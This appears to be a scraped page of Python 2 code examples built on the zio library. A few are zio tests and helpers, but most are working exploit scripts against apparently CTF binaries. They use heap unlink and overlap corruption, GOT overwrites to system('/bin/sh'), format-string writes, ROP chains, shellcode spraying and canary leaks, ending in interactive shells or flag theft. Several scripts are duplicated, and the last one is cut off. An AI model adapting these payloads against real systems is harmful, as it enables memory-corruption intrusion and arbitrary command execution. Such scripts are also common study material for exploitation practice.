Пример #1
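    def test_tty_raw_out(self):
        """Check that stdout=TTY_RAW hands the child's output back byte-for-byte.

        Two probes: a printf with a random mix of CRLF/LF line endings (a
        cooked tty would rewrite '\\n' as '\\r\\n'), then a helper script
        (myprintf.py, looked up next to the running test script) that emits
        every non-printable byte, so the raw path is shown to neither
        translate nor drop any of them. Both children are closed even if a
        read raises.
        """
        s = []
        ans = []
        for i in range(10):
            r = random.randint(0, 1)
            # s holds the escape text handed to printf, ans the bytes expected back
            s.append('%d%s' % (i, r and '\\r\\n' or '\\n'))
            ans.append('%d%s' % (i, r and '\r\n' or '\n'))
        ans = ''.join(ans)
        cmd = "printf '" + ''.join(s) + "'"
        io = zio(cmd, stdout=TTY_RAW)
        try:
            rd = io.read()
        finally:
            io.close()
        self.assertEqual(rd, ans)

        unprintable = [
            chr(c) for c in range(256) if chr(c) not in string.printable
        ]
        random.shuffle(unprintable)  # order is irrelevant; one shuffle is enough

        from zio import which
        py = which('python2') or which('python')
        self.assertNotEqual(py, None)
        # repr() turns the raw bytes into \xNN escapes the helper un-escapes;
        # the outer single quotes keep the shell from touching them.
        io = zio(' '.join([
            py, '-u',
            os.path.join(os.path.dirname(sys.argv[0]), 'myprintf.py'),
            "'\\r\\n" + repr(''.join(unprintable))[1:-1] + "\\n'"
        ]),
                 stdout=TTY_RAW,
                 print_read=COLORED(REPR))
        try:
            rd = io.read()
        finally:
            io.close()  # always reap the second child too
        self.assertEqual(rd, "\r\n" + ''.join(unprintable) + "\n")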
Пример #2
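    def cmdline(self, cmd, **kwargs):
        """Yield zio handles to `cmd`: first a direct child, then via a loopback socket.

        `cmd` is spawned directly and yielded. After the caller resumes, the
        child is closed and its exit code printed. socat is then asked to
        listen on a random high port on 127.0.0.1 and exec `cmd` for the
        client, and a (host, port) zio session to it is yielded, so one test
        body runs against both target kinds.

        Keyword extras: `socat_exec` (default ',pty,stderr,ctty') is appended
        to socat's exec: address; every other kwarg goes to zio(). Raises
        ValueError if `cmd` contains a double quote, since it is spliced
        verbatim into the quoted socat address. A consumer that stops
        iterating early skips the cleanup after each yield.
        """
        print ''
        socat_exec = ',pty,stderr,ctty'
        if 'socat_exec' in kwargs:
            socat_exec = kwargs['socat_exec']
            del kwargs['socat_exec']
        io = zio(cmd, **kwargs)
        yield io
        io.close()
        print '"%s" exited: ' % cmd, io.exit_code

        # cmd goes inside exec:"..." unescaped; a '"' would end the address early
        if '"' in cmd:
            raise ValueError('cmd must not contain a double quote: %r' % (cmd,))

        for _ in range(16):
            port = random.randint(31337, 65530)
            # bind=127.0.0.1 keeps the exec'd command off the network; the
            # client below only ever connects to loopback anyway.
            p = subprocess.Popen([
                'socat',
                'TCP-LISTEN:%d,bind=127.0.0.1' % port,
                'exec:"' + cmd + '"' + socat_exec
            ])
            time.sleep(0.2)
            # returncode is only populated by poll()/wait(); reading the
            # attribute directly always sees None here.
            if p.poll() is not None:
                continue  # socat exited early (port taken, bad address)
            try:
                io = zio(('127.0.0.1', port), **kwargs)
                yield io
            except socket.error:
                p.terminate()  # do not leave a listener behind on failure
                p.wait()
                continue
            io.close()
            p.terminate()
            p.wait()
            break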
Пример #3
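 def cmdline(self, cmd, **kwargs):
     """Yield zio handles to `cmd`: first a direct child, then via a loopback socket.

     `cmd` is spawned directly and yielded. After the caller resumes, the
     child is closed and its exit code printed. socat is then asked to
     listen on a random high port on 127.0.0.1 and exec `cmd` for the
     client, and a (host, port) zio session to it is yielded, so one test
     body runs against both target kinds.

     Keyword extras: `socat_exec` (default ',pty,stderr,ctty') is appended
     to socat's exec: address; every other kwarg goes to zio(). Raises
     ValueError if `cmd` contains a double quote, since it is spliced
     verbatim into the quoted socat address. A consumer that stops
     iterating early skips the cleanup after each yield.
     """
     print ''
     socat_exec = ',pty,stderr,ctty'
     if 'socat_exec' in kwargs:
         socat_exec = kwargs['socat_exec']
         del kwargs['socat_exec']
     io = zio(cmd, **kwargs)
     yield io
     io.close()
     print '"%s" exited: ' % cmd, io.exit_code

     # cmd goes inside exec:"..." unescaped; a '"' would end the address early
     if '"' in cmd:
         raise ValueError('cmd must not contain a double quote: %r' % (cmd,))

     for _ in range(16):
         port = random.randint(31337, 65530)
         # bind=127.0.0.1 keeps the exec'd command off the network; the
         # client below only ever connects to loopback anyway.
         p = subprocess.Popen(['socat', 'TCP-LISTEN:%d,bind=127.0.0.1' % port, 'exec:"' + cmd + '"' + socat_exec])
         time.sleep(0.2)
         # returncode is only populated by poll()/wait(); reading the
         # attribute directly always sees None here.
         if p.poll() is not None:
             continue  # socat exited early (port taken, bad address)
         try:
             io = zio(('127.0.0.1', port), **kwargs)
             yield io
         except socket.error:
             p.terminate()  # do not leave a listener behind on failure
             p.wait()
             continue
         io.close()
         p.terminate()
         p.wait()
         break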
Пример #4
def mk(target, debug=True):
    """Open a zio session to `target`; `debug` turns on coloured REPR tracing.

    Both variants share the same timeout (10000); the only difference is
    whether reads (red) and writes (yellow) are echoed to the terminal.
    """
    opts = {'timeout': 10000}
    if debug:
        opts['print_read'] = COLORED(REPR, 'red')
        opts['print_write'] = COLORED(REPR, 'yellow')
    else:
        opts['print_read'] = False
        opts['print_write'] = False
    return zio(target, **opts)
Пример #5
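    def test_tty(self):
        """A plain child sees no tty; with stdin=TTY it is handed a real /dev/* device.

        Each child is closed even if the read raises.
        """
        print ''
        io = zio('tty')
        try:
            out = io.read()
        finally:
            io.close()
        self.assertEqual(out.strip(), 'not a tty', repr(out))

        io = zio('tty', stdin = TTY)
        try:
            out = io.read()
        finally:
            io.close()
        self.assertTrue(out.strip().startswith('/dev/'), repr(out))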
Пример #6
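    def test_tty(self):
        """A plain child sees no tty; with stdin=TTY it is handed a real /dev/* device.

        Each child is closed even if the read raises.
        """
        print ''
        io = zio('tty')
        try:
            out = io.read()
        finally:
            io.close()
        self.assertEqual(out.strip(), 'not a tty', repr(out))

        io = zio('tty', stdin=TTY)
        try:
            out = io.read()
        finally:
            io.close()
        self.assertTrue(out.strip().startswith('/dev/'), repr(out))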
Пример #7
def exp(target):
    """Heap exploit against the 'sc' note manager (new_sc/edit_sc/delete_sc/list_sc live elsewhere).

    Outline, as far as the visible calls show:
      1. three 0x80-byte entries; the third starts with '/bin/sh;'.
      2. entry 0 is rewritten as a fake chunk whose fd/bk are ptr_addr-0x18 /
         ptr_addr-0x10 (the classic unlink pointer-rewrite shape); deleting
         entry 1 triggers it (the inline comment records the effect).
      3. entry 0 is rewritten again so its data pointer (presumably the last
         qword) is free@got, and list_sc() leaks free()'s libc address.
      4. system() is derived from the leak with hard-coded libc offsets and
         written over free@got.
      5. deleting entry 2 free()s the '/bin/sh;...' buffer, i.e. runs it
         through system().
    Every address and offset below is specific to one binary/libc build.
    """
    #io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
    io = zio(target,
             timeout=10000,
             print_read=COLORED(RAW, 'red'),
             print_write=COLORED(RAW, 'green'))
    new_sc(io, 'a' * 0x80)  #0x603010
    new_sc(io, 'b' * 0x80)  #0x6030c0
    new_sc(io, '/bin/sh;' + 'c' * 0x78)  #0x603170
    ptr_addr = 0x00000000006016d0  # global slot holding the entry pointer
    #							  rax				  rdx
    # fake chunk: prev_size, size 0x81, fd, bk, filler, then the following
    # chunk's prev_size 0x80 / size 0x90 (PREV_INUSE clear -> fake chunk "free")
    payload = l64(0) + l64(0x81) + l64(ptr_addr - 0x18) + l64(
        ptr_addr - 0x10) + 'a' * 0x60 + l64(0x80) + l64(0x90)
    edit_sc(io, 0, payload)  # change *0x6016d0 = 0x6016b8
    delete_sc(io, 1)
    free_got = 0x0000000000601600
    payload2 = l64(0) + l64(1) + l64(0x80) + l64(free_got)  # last field presumably the data pointer
    edit_sc(io, 0, payload2)
    free_addr = list_sc(io)
    print hex(free_addr)
    #local
    system_addr = 0x00007FFFF7A5B640  # dead: overwritten on the next line (local-debug value)
    system_addr = 0x0000000000044C40 + free_addr - 0x0000000000082DA0  # system = leak - free_off + system_off
    '''
  libc_base = free_addr - 0x0000000000082DF0
  system_addr = libc_base + 0x0000000000046640
  '''
    edit_sc(io, 0, l64(system_addr))  # free@got <- system
    delete_sc(io, 2)  # free('/bin/sh;ccc...') now runs system('/bin/sh;ccc...')
    io.interact()
Пример #8
def exp(target):
    """Heap-corruption driver for the 'function' editor (add_function/enter_edit/edit_comments/add_read_write/interact live elsewhere).

    Two function entries are created, then edit_comments() is called with
    indices well outside a normal range (100, 200, -1) - evidently the
    out-of-bounds write primitive. The -1 write lays down a fake chunk
    (size 0x51, fd/bk = heap_ptr-0x18 / heap_ptr-0x10, the unlink shape)
    followed by a 0x50/0xa0 header pair; the 200-index write prepares
    neighbouring 0x31/0x21 headers first. What the final add_read_write()
    achieves is not visible here. All addresses are for one specific build.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    add_function(io, 'fun1', 'para1', 'data1')
    add_function(io, 'fun2', 'para2', 'data2')
    enter_edit(io, 2)
    edit_comments(io, 100, 'comment')
    add_read_write(io, 'a' * 80, 'b' * 80)

    heap_ptr = 0x6036f0  # global pointer the fake fd/bk are aimed around
    payload = 'a' * 0x60 + l64(0) + l64(0) + l64(0) + l64(0x51) + l64(
        heap_ptr - 0x18) + l64(heap_ptr - 0x10)
    payload += 'a' * 0x30 + l64(0x50) + l64(0xa0)

    enter_edit(io, 1)
    edit_comments(
        io, 200,
        'a' * 0x30 + l64(0) + l64(0x31) + 'a' * 0x20 + l64(0) + l64(0x21))

    enter_edit(io, 2)
    edit_comments(io, -1, payload)

    add_read_write(io, '', 'b' * 99)

    # addresses noted while debugging one build:
    #g_readall :0x0000000000604460
    #g_writeall: 0x0000000000604400
    #g_ptr: 0x0000000000604050
    #comment: 0x0000000000604390
    #0x00000000006044c0

    interact(io)
Пример #9
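def exp(target):
    """Format-string exploit: leak with '%2217$x', then a '%2217$lln' write.

    At prompt (1) the leak format is sent and the hex the target prints on
    the following line is parsed. Only if that equals the expected key
    address (0x804a060) does the script continue: it sends the %lln write at
    prompt (2), answers prompts (3), (4) and 'key :' with '0', and hands the
    session over interactively. Otherwise the session is closed and the
    function returns without a shell.

    `target` is passed straight to zio() (it was previously ignored in
    favour of a hard-coded './fsb'); the prompt strings are specific to that
    binary. A garbled or missing leak line leaves `leak` at 0, which fails
    the address check. Exits the interpreter after the shell ends.
    """
    import sys

    io = zio(target, print_read=False, print_write=False)
    io.read_until('(1)')
    io.writeline('%2217$x')
    leak = 0
    try:
        io.read_line()
        leak = int(io.read_until('\n')[0:-1], 16)
    except Exception:
        # unexpected output or a timeout: leak stays 0 and the check below fails
        pass
    print hex(leak)
    if leak != 0x804a060:
        io.close()
        return
    print '\n[+] find address of key'
    io.read_until('(2)')
    io.writeline('%2217$lln')
    io.read_until('(3)')
    io.writeline('0')
    io.read_until('(4)')
    io.writeline('0')
    io.read_until('key :')
    io.writeline('0')
    print '[+] your shell !'
    io.interact()
    io.close()
    sys.exit()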
Пример #10
def get_io(target):
    """Return a zio session to `target` with colourised raw I/O tracing.

    ELF(target) is invoked for its side effects only (its return value is
    dropped). The 9999 timeout keeps interactive use from timing out.
    """
    ELF(target)
    read_trace = COLORED(RAW, "green")
    write_trace = COLORED(RAW, "blue")
    return zio(target, timeout=9999, print_read=read_trace, print_write=write_trace)
Пример #11
def exp(target):
    """Stack ROP smuggled inside a 16000-byte input with a fixed byte histogram.

    count_dict spreads 16000 bytes as evenly as possible over the values
    0..0xd0 - apparently the shape of input the target insists on (the check
    itself is not visible here). The ROP chain (pop rdi; ret -> `sh`, an
    address presumably holding a shell string -> system@plt) is charged
    against that budget so the histogram still balances, and spliced in at
    offset 0x18. Every chain byte must be <= 0xd0 or count_dict raises
    KeyError. The leading l32(8001)/l32(0x20) fields' meaning is not
    visible here. Two gdb_hint() pauses are left in for local debugging.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    io.gdb_hint()
    io.read_until('Bucko')

    count_dict = {}
    for i in range(0xd1):
        count = 16000 / 0xd1  # Python 2 integer division (// under Python 3)
        if i < 16000 % 0xd1:
            count += 1  # the remainder goes one-each to the lowest values
        count_dict[i] = count

    system_plt = 0x0000000000400FD0
    pop_rdi_ret = 0x0000000000402703
    sh = 0x4008ca

    payload = l32(8001) + l32(0x20) + 'a' * 8
    payload += l64(pop_rdi_ret) + l64(sh) + l64(system_plt)

    # every chain byte is subtracted from the filler budget so the overall
    # histogram is unchanged once the chain is spliced in
    for c in payload:
        count_dict[ord(c)] -= 1

    d = ''
    for i in range(0xd1):
        d += chr(i) * count_dict[i]

    d = d[0:0x18] + payload + d[0x18:]

    io.gdb_hint()
    io.writeline(d)
    interact(io)
Пример #12
def exp(target):
    """Spray-and-overwrite exploit using the note helpers (create/delete/write/read_note, secret, exit_ret live elsewhere).

    create_note() apparently returns (id, address). Phase 1 re-allocates
    until a note lands below 0xf0000000 and fills it with a NOP sled plus
    the module-level `shellcode`. Phase 2 grows the stack by calling
    secret() 0x1000 times with 0x400-byte input. Phase 3 hunts for a note
    mapped in the 0xf7ffc000..0xffd60000 window whose content is not a lone
    newline, floods it with the shellcode address and returns through
    exit_ret(). 32-bit addresses throughout; output is verbose on purpose.
    """
    io = zio(target, timeout=10000, print_read=False, print_write=False)
    mem = create_note(io)
    while mem[1] > 0xf0000000:
        delete_note(io, mem[0])
        mem = create_note(io)
        print hex(mem[1])
    write_note(io, mem[0], shellcode.rjust(0x100, '\x90'))

    # stack grow
    for i in range(0, 0x1000):
        secret(io, 'A' * 0x400)
        print i

    mem1 = create_note(io)
    # NOTE(review): the second condition reads mem[1] (the shellcode note,
    # already known to be < 0xf0000000, so it is always False); mem1[1] was
    # probably intended. The inner break is what actually ends the search,
    # so confirm before changing it.
    while (mem1[1] < 0xffd60000) or (mem[1] > 0xffffd000):
        delete_note(io, mem1[0])
        mem1 = create_note(io)
        note = read_note(io, mem1[0])
        print "[-] memory address: " + hex(mem1[1])
        print "[-] note: " + note.encode('hex') + '\n'
        if (mem1[1] >= 0xf7ffc000) and (mem1[1] < 0xffd60000):
            if note != '\x0a':
                break

    payload = l32(mem[1]) * (0x1000 / 4 - 1)  # 0x1000/4 is Python 2 integer division
    print '\n-------------find it-------------------'
    print '[+] write to     :   ' + hex(mem1[1])
    print '[+] with payload :   ' + payload.encode('hex')
    write_note(io, mem1[0], payload)

    exit_ret(io)
    io.interact()
    io.close()
Пример #13
def exp(target):
    """Leak atoi@got through a dangling comment pointer, then swap atoi for system.

    Flow (helpers live elsewhere): create two functions, point function 2's
    comment pointer at atoi@got via an oversized edit_comments(666, ...)
    write, delete it, re-create three functions so one inherits the poisoned
    slot, and read it back with show_function(3) after the '#' marker.
    system() is then computed with hard-coded libc offsets and written over
    atoi@got as 7 bytes (the top byte of a user-space address is already 0,
    and the write is presumably NUL-terminated). Typing 'sh' at the next
    'Option' prompt goes through atoi -> system. Addresses are for one build.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    add_function(io, 'fun1', 'para1', 'data1')
    add_function(io, 'fun2', 'para2', 'data2')
    enter_edit(io, 2)

    atoi_got = 0x603230
    edit_comments(io, 666, 'a' * 0x18 + l64(atoi_got))  # 0x18 bytes of filler, then the pointer

    #fun1 0x604070
    #fun2 0x604200 comment:0x604390
    delete_function(io, 2)

    add_function(io, 'fun3', 'para3', 'data3')
    add_function(io, 'fun4', 'para4', 'data4')
    add_function(io, 'fun5', 'para5', 'data5')

    show_function(io, 3)
    io.read_until('#')
    # the leaked pointer comes back as raw bytes; pad to 8 before unpacking
    atoi = l64(io.readline()[:-1].ljust(8, '\x00'))
    print hex(atoi)

    base = atoi - 0x0000000000036E80  # libc offsets for one specific build
    system = base + 0x0000000000045390

    # alternative offsets (another libc build), kept for reference:
    #base = atoi - 0x0000000000033C10
    #system = base + 0x000000000003E8B0

    enter_edit(io, 3)
    edit_comments(io, 8, l64(system)[:-1])  # atoi@got <- system (7 bytes)
    io.read_until('Option')
    io.writeline('sh')  # atoi('sh') is now system('sh')

    interact(io)
Пример #14
def exp(target):
    """Format-string GOT overwrite delivered through the target's RSA 'decrypt' path.

    A toy RSA key (p=7, q=37, e=7; d from egcd(), defined elsewhere) is
    installed with set_key() so that get_cypher() can encrypt the payload
    and decrypt() makes the target run it through printf. The format string
    mixes %n and %hn writes (arguments 77..83 are the eight pointers
    appended after it) aimed at the halves of printf@got and putchar@got,
    and ends with ';/bin/sh\\x00'. plt_system and adr_ret are unused below.
    Offsets and argument numbers are for one build.
    """
    p = 7
    q = 37
    e = 7
    d = egcd(e, (p - 1) * (q - 1))  # presumably returns the private exponent; verify against egcd()
    # print 'p=%d\nq=%d\ne=%d\nd=%d\n' % (p, q, e, d)

    # io = zio(target, timeout = 100000, print_read = COLORED(RAW, 'red'), print_write = COLORED(RAW, 'yellow'))
    io = zio(target, timeout=100000, print_read=False, print_write=False)
    set_key(io, p, q, e, d)

    plt_system = 0x004007c0  # unused below
    got_printf = 0x00602028
    got_putchar = 0x00602000
    adr_ret = 0x0040122b  # unused below

    # the two leading %n fire before anything is printed (write 0); the
    # %0NNlx pads set up the count for each following %hn
    payload = get_cypher(
        io,
        '%83$n%79$n%064lx%78$hn%82$hn%01920lx%77$hn%02667lx%81$hn;/bin/sh\x00')
    payload += l64(got_printf)
    payload += l64(got_printf + 2)
    payload += l64(got_printf + 4)
    payload += l64(got_printf + 6)
    payload += l64(got_putchar)
    payload += l64(got_putchar + 2)
    payload += l64(got_putchar + 4)
    payload += l64(got_putchar + 6)
    decrypt(io, payload)
    io.interact()
def exp(target):
    """32-bit heap exploit on the 'domain' manager (add/remove/lookup/list/edit_domain_name live elsewhere).

    The carefully sized add_domain() calls lay the heap out so that, after
    two frees and a lookup, a fresh allocation (payload2) overlaps an
    existing record and replaces what is presumably its name pointer with
    free@got; list_domain() then leaks free()'s address. system is computed
    with the '#remote' offsets (the '#local' constant is overwritten on the
    next line), written over free@got through edit_domain_name(), and
    removing domain 10 ('/bin/sh;...') calls it. The inline hex comments
    are one build's heap addresses. gdb_hint() is left in for debugging.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    io.gdb_hint()
    add_domain(io, '0' * (0x800 - 16 - 8 - 1 - 4 - 3)+'12') #0 0x804c008 0x804c7f0
    add_domain(io, '0'*0x770) #1 0x804c878 0x804cff0  top=0x804d070
    add_domain(io, '0'*0x1a0) #2
    add_domain(io, '/bin/sh'+'0'*0x88) #3 0x0804d340 0x0804d2a8
    add_domain(io, '0'*0x10) #4 0x0804d3e0
    add_domain(io, '0'*0x5b0) #5
    add_domain(io, '0'*0x770) #6
    add_domain(io, '0'*0x770) #7
    add_domain(io, '0'*0x770) #8
    add_domain(io, '0'*0x770) #9
    add_domain(io, '/bin/sh;'+'0'*(0x770-8)) #10

    remove_domain(io, 1)
    lookup_domain(io, 0)

    remove_domain(io, 2) # top = 0x804d070 unsort=0x804d218

    ptr_addr = 0x0804b0a4  # unused below
    add_domain(io, '0'*0x90) #1 0x0804d220
    free_got = 0x0804b004
    payload2 = 272*'1' + l32(free_got)  # filler up to the overlapped pointer field, then free@got
    add_domain(io, payload2)
    free = list_domain(io)
    #local
    system = 0xb7e55060  # dead: overwritten by the remote computation below
    #remote
    system = free - 0x781b0 + 0x3d170  # system = free - free_off + system_off
    edit_domain_name(io, 1, l32(system))  # free@got <- system
    remove_domain(io, 10)  # free('/bin/sh;...') -> system('/bin/sh;...')
    io.interact()
Пример #16
def exp(target):
  """Heap exploit against the 'sc' note manager (new_sc/edit_sc/delete_sc/list_sc live elsewhere).

  Outline, as far as the visible calls show:
    1. three 0x80-byte entries; the third starts with '/bin/sh;'.
    2. entry 0 is rewritten as a fake chunk whose fd/bk are ptr_addr-0x18 /
       ptr_addr-0x10 (the classic unlink pointer-rewrite shape); deleting
       entry 1 triggers it (the inline comment records the effect).
    3. entry 0 is rewritten again so its data pointer (presumably the last
       qword) is free@got, and list_sc() leaks free()'s libc address.
    4. system() is derived from the leak with hard-coded libc offsets and
       written over free@got.
    5. deleting entry 2 free()s the '/bin/sh;...' buffer, i.e. runs it
       through system().
  Every address and offset below is specific to one binary/libc build.
  """
  #io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
  io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
  new_sc(io, 'a'*0x80) #0x603010
  new_sc(io, 'b'*0x80) #0x6030c0
  new_sc(io, '/bin/sh;'+'c'*0x78) #0x603170
  ptr_addr = 0x00000000006016d0  # global slot holding the entry pointer
  #							  rax				  rdx
  # fake chunk: prev_size, size 0x81, fd, bk, filler, then the following
  # chunk's prev_size 0x80 / size 0x90 (PREV_INUSE clear -> fake chunk "free")
  payload = l64(0) + l64(0x81) + l64(ptr_addr-0x18) + l64(ptr_addr-0x10) + 'a'*0x60 + l64(0x80) + l64(0x90)
  edit_sc(io, 0, payload) # change *0x6016d0 = 0x6016b8
  delete_sc(io, 1)
  free_got = 0x0000000000601600
  payload2 = l64(0) + l64(1) +l64(0x80) + l64(free_got)  # last field presumably the data pointer
  edit_sc(io, 0, payload2)
  free_addr = list_sc(io)
  print hex(free_addr)
  #local
  system_addr = 0x00007FFFF7A5B640  # dead: overwritten on the next line (local-debug value)
  system_addr = 0x0000000000044C40 + free_addr - 0x0000000000082DA0  # system = leak - free_off + system_off
  '''
  libc_base = free_addr - 0x0000000000082DF0
  system_addr = libc_base + 0x0000000000046640
  '''
  edit_sc(io, 0, l64(system_addr))  # free@got <- system
  delete_sc(io, 2)  # free('/bin/sh;ccc...') now runs system('/bin/sh;ccc...')
  io.interact()
Пример #17
def exp(target):
    """Recover the stack canary from a time-seeded 'captcha', then ret2system (32-bit).

    ./leak is run with a guess of the target's seed (current time +/- up to
    10 s) and prints '*'-separated values; the captcha the target shows is a
    linear combination of those values and the canary, so the canary is
    solved for arithmetically. The exact combination mirrors the target's
    generator (not visible here); if the seed guess is wrong the result is
    garbage and the overflow will crash. The payload (0x200 filler, canary,
    0xc filler, system@plt, fake return, pointer into the global buffer) is
    base64-encoded because the target asks for that; 'A/bin/sh' appended
    after it is the data the pointer presumably lands on.
    """
    # leak info
    # the only thing interpolated into the shell string is an int, so it
    # cannot be injected into; subprocess with an argv list is still the safer idiom
    leak = os.popen('./leak ' +
                    str(int(time.time()) +
                        random.randint(-10, 10))).read().split('*')[0:-1]
    leak = [int(l) for l in leak]
    io = zio(target, print_read=False, print_write=False)

    # calc canary
    io.read_until('input captcha : ')
    captcha = int(io.read_line()[0:-1])
    canary = captcha - leak[1] - leak[2] + leak[3] - leak[4] - leak[5] + leak[
        6] - leak[7]
    print '[+] leak canary : ' + hex(ctypes.c_uint32(canary).value)  # display as unsigned 32-bit

    io.writeline(str(captcha))
    io.read_until('Encode your data with BASE64 then paste me!')

    plt_system = 0x8048880
    adr_gbuf = 0x804b0e0

    payload = 'A' * 0x200
    payload += l32(canary)
    payload += 'A' * 0xc
    payload += l32(plt_system)
    payload += l32(0xdeadbeef)  # system's return address, never reached
    payload += l32(adr_gbuf + 0x2d1)  # system's argument: offset 0x2d1 into the global buffer

    io.writeline(base64.b64encode(payload) + 'A/bin/sh')
    io.interact()
Пример #18
def get_io(target):
    """Return a zio session to `target` with colourised raw I/O tracing.

    ELF("./main") is always loaded first, regardless of `target`, for its
    side effects only (the return value is dropped). The 9999 timeout keeps
    interactive use from timing out.
    """
    ELF("./main")
    read_trace = COLORED(RAW, 'green')
    write_trace = COLORED(RAW, 'blue')
    return zio(target, timeout=9999, print_read=read_trace, print_write=write_trace)
Пример #19
def exp(target):
  """32-bit heap exploit on the 'domain' manager, local-libc variant (helpers live elsewhere).

  Same layout as the remote variant: sized add_domain() calls, two frees and
  a lookup, then a fresh allocation (payload2) that overlaps an existing
  record and replaces what is presumably its name pointer with free@got so
  list_domain() leaks free()'s address. Here the leak is only printed by
  the helper: the '#remote' computation is commented out and the
  hard-coded '#local' system address (0xb7e55060, no ASLR) is written over
  free@got, then removing domain 10 ('/bin/sh;...') calls it. The inline
  hex comments are one build's heap addresses. gdb_hint() is left in.
  """
  io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
  io.gdb_hint()
  add_domain(io, '0' * (0x800 - 16 - 8 - 1 - 4 - 3)+'12') #0 0x804c008 0x804c7f0
  add_domain(io, '0'*0x770) #1 0x804c878 0x804cff0  top=0x804d070
  add_domain(io, '0'*0x1a0) #2
  add_domain(io, '/bin/sh'+'0'*0x88) #3 0x0804d340 0x0804d2a8
  add_domain(io, '0'*0x10) #4 0x0804d3e0
  add_domain(io, '0'*0x5b0) #5
  add_domain(io, '0'*0x770) #6
  add_domain(io, '0'*0x770) #7
  add_domain(io, '0'*0x770) #8
  add_domain(io, '0'*0x770) #9
  add_domain(io, '/bin/sh;'+'0'*(0x770-8)) #10
  remove_domain(io, 1)
  lookup_domain(io, 0)
  remove_domain(io, 2) # top = 0x804d070 unsort=0x804d218
  ptr_addr = 0x0804b0a4  # unused below
  add_domain(io, '0'*0x90) #1 0x0804d220
  free_got = 0x0804b004
  payload2 = 272*'1' + l32(free_got)  # filler up to the overlapped pointer field, then free@got
  add_domain(io, payload2)
  free = list_domain(io)  # leaked but not used: the local system address below is fixed
  #local
  system = 0xb7e55060
  #remote
  #system = free - 0x781b0 + 0x3d170
  edit_domain_name(io, 1, l32(system))  # free@got <- system
  remove_domain(io, 10)  # free('/bin/sh;...') -> system('/bin/sh;...')
  io.interact()
Пример #20
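def get_io(target):
    """Return a quiet zio session to `target` (no read/write echo).

    The 9999 timeout keeps interactive use from timing out. To get coloured
    tracing back while debugging, pass print_read=COLORED(RAW, "green") and
    print_write=COLORED(RAW, "blue") to zio(); the dead locals that used to
    build those modes without passing them on have been removed.
    """
    return zio(target, timeout=9999)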
Пример #21
def exp(target):
    """Two-stage format-string exploit: leak libc and stack, then free@got -> system via %hn.

    send_message()/do_fmt2()/submit_flag() live elsewhere. '%63$p' leaks a
    libc pointer (libc_base via a hard-coded offset) and '%46$p' a stack
    pointer (only printed). The three 16-bit halves of system are written
    to free_got, +2, +4 with %hn; the writes are sorted by value so each
    '%Nx' pad only ever adds to the running count. 'aaa;sh;' at the front
    becomes the command once free() is system(). The final raw writes
    (l16/l32 header + '\\x03sh;') speak the target's message framing; 'echo
    123' confirms the shell before the flag is read and submitted. The
    Token lines are a disabled earlier auth step.
    """
    io = zio(target, timeout=30, print_read=COLORED(NONE, 'red'), \
             print_write=COLORED(NONE, 'green'))
    #io.read_until('Token')
    #io.writeline('NxArhGPKLMmen9Y9QPePHSBbFqQPiqnU')
    io.read_until('?')
    io.writeline('S')

    d = int(send_message(io, '%63$p'), 16)

    libc_base = d - 0x0000000000020830  # offset for one libc build

    print 'libc_base', hex(libc_base)
    system = libc_base + 0x0000000000045390
    binsh = libc_base + 0x000000000018CD17  # unused below
    pop_rdi_ret = 0x0000000000402723  # unused below

    stack = int(send_message(io, '%46$p'), 16)
    print 'stack', hex(stack)

    free_got = 0x00000000006040A8
    addr = l64(free_got)+l64(free_got+2)+l64(free_got+4)  # the three %hn targets, appended at offset 48
    writes = {}
    writes[0] = system & 0xffff
    writes[1] = (system>> 16) & 0xffff
    writes[2] = (system>> 32) & 0xffff

    payload = 'aaa;sh;'
    printed = len(payload)
    # ascending by value: every step only needs to print more, never less
    for where, what in sorted(writes.items(), key=operator.itemgetter(1)):
        delta = (what - printed) & 0xffff
        if delta > 0:
            if delta < 8:
                payload += 'A' * delta  # literal pad for tiny deltas instead of a %Nx
            else:
                payload += '%' + str(delta) + 'x'

        payload += '%' + str(14 + where) + '$hn'  # argument 14 presumably maps to the start of `addr`
        printed += delta

    payload = payload.ljust(48, 'a')
    payload += addr
    print len(payload)


    do_fmt2(io, payload)

    payload = '\x03sh;'
    io.write(l16(1)+l16(0)+l32(len(payload)+8))  # framing header; field meanings not visible here
    io.write(payload)
    io.writeline('echo 123')
    io.read_until('123\n')

    io.writeline('./bin/cat flag/flag')
    flag = io.readline()[:-1].strip()
    print target
    print 'flag', flag
    submit_flag(flag)
    io.close()
Пример #22
def exp(target):
    """Two-round exploit: leak a puts pointer through a cookie-mangled fake frame, then ret2libc.

    show()/edit()/rol()/HEX()/interact() live elsewhere. The large value
    92233720368547759 sent at the ':' prompt is presumably what makes
    show(1) return (base, rsp, cookie). Stored pointers are mangled as
    rol(value ^ cookie), so the fake rsp and the pop rdi gadget are written
    through edit() in that form. Round 1 runs puts(puts@got) and returns to
    main, leaking puts' libc address; round 2 repeats the setup with a
    different fake rsp and runs system(binsh). The '5;' prefix is a menu
    choice followed by 6 bytes of filler. The triple-quoted block holds
    offsets for a second libc build; one gdb_hint() pause is left active.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))

    io.read_until(':')
    io.writeline(str(92233720368547759))
    base, rsp, cookie = show(io, 1)
    print 'base', hex(base)

    fake_rsp = rsp - 0x48
    pop_rdi_ret = base + 0x000000000001523  # PIE binary: gadget is relative to base

    addr = l64(rol(fake_rsp ^ cookie)) + l64(rol(pop_rdi_ret ^ cookie))  # mangled pair
    print HEX(addr)
    edit(io, 1, 0, "", addr, "")

    io.read_until('>>')
    payload = '5;' + 'a' * 6

    puts_got = 0x0000000000202018 + base
    puts_plt = 0x9a0 + base
    main = base + 0x00000000000013ff
    payload += l64(puts_got) + l64(puts_plt) + l64(main)  # puts(puts@got); back to main
    io.writeline(payload)

